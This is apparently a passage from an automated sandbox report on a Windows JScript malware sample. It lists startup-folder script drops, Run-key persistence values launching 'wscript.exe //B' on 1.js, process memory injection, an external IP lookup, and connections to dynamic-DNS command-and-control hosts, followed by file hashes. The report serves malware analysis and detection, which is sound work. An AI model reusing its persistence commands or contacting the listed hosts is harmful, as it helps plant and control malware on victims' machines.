| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js | C:\Windows\system32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\1.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2044 wrote to memory of 1696 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 2044 wrote to memory of 1696 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 2044 wrote to memory of 1696 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 2044 wrote to memory of 268 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 2044 wrote to memory of 268 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 2044 wrote to memory of 268 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 268 wrote to memory of 1500 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 268 wrote to memory of 1500 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 268 wrote to memory of 1500 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\1.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | javaautorun.duia.ro | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ebuleakonangookpala.dynamic-dns.net | udp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| BG | 193.42.32.233:9202 | ebuleakonangookpala.dynamic-dns.net | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
| EE | 91.193.75.131:5449 | javaautorun.duia.ro | tcp |
Files
C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js
| MD5 | 0fbcb6f83b0f64e57835d021bb6e917d |
| SHA1 | 0fa656e1cf06a0ea20e19a4ddd951f0d0d05dc38 |
| SHA256 | c518c547d809de7ccae1259611bcb52d6fa435cff67c910d25c5b961ddc45466 |
| SHA512 | 70f322596a2ba8e079d39d35a10e771f8269dc08e03713736ba070f6cf34cf9bbcb9ac1065a66ad0a0afb66ad68e000953e593164d8858224ce1aeb4cde5120f |
C:\Users\Admin\AppData\Roaming\1.js
| MD5 | 9cf2c793029ae8dd84a387ba66e8c432 |
| SHA1 | 48f6d8e5c4f55434a3d1fdc1531bd37fb6248d10 |
| SHA256 | d76d9fa7fa75a31b2a62804c8925a1c352f407831865bebc005b7f01676b5ac9 |
| SHA512 | 33dd2fbc290c8feb31570e200f469729d5385e3f214edb4299b47bd841a0cd24a9ea211808e6c58cef63a812b27558852dbed2daf0cfac8953b3d028fd019848 |
C:\Users\Admin\AppData\Roaming\xQgwkAjhRq.js
| MD5 | 0fbcb6f83b0f64e57835d021bb6e917d |
| SHA1 | 0fa656e1cf06a0ea20e19a4ddd951f0d0d05dc38 |
| SHA256 | c518c547d809de7ccae1259611bcb52d6fa435cff67c910d25c5b961ddc45466 |
| SHA512 | 70f322596a2ba8e079d39d35a10e771f8269dc08e03713736ba070f6cf34cf9bbcb9ac1065a66ad0a0afb66ad68e000953e593164d8858224ce1aeb4cde5120f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js
| MD5 | 9cf2c793029ae8dd84a387ba66e8c432 |
| SHA1 | 48f6d8e5c4f55434a3d1fdc1531bd37fb6248d10 |
| SHA256 | d76d9fa7fa75a31b2a62804c8925a1c352f407831865bebc005b7f01676b5ac9 |
| SHA512 | 33dd2fbc290c8feb31570e200f469729d5385e3f214edb4299b47bd841a0cd24a9ea211808e6c58cef63a812b27558852dbed2daf0cfac8953b3d028fd019848 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.js
| MD5 | 9cf2c793029ae8dd84a387ba66e8c432 |
| SHA1 | 48f6d8e5c4f55434a3d1fdc1531bd37fb6248d10 |
| SHA256 | d76d9fa7fa75a31b2a62804c8925a1c352f407831865bebc005b7f01676b5ac9 |
| SHA512 | 33dd2fbc290c8feb31570e200f469729d5385e3f214edb4299b47bd841a0cd24a9ea211808e6c58cef63a812b27558852dbed2daf0cfac8953b3d028fd019848 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xQgwkAjhRq.js
| MD5 | 0fbcb6f83b0f64e57835d021bb6e917d |
| SHA1 | 0fa656e1cf06a0ea20e19a4ddd951f0d0d05dc38 |
| SHA256 | c518c547d809de7ccae1259611bcb52d6fa435cff67c910d25c5b961ddc45466 |
| SHA512 | 70f322596a2ba8e079d39d35a10e771f8269dc08e03713736ba070f6cf34cf9bbcb9ac1065a66ad0a0afb66ad68e000953e593164d8858224ce1aeb4cde5120f |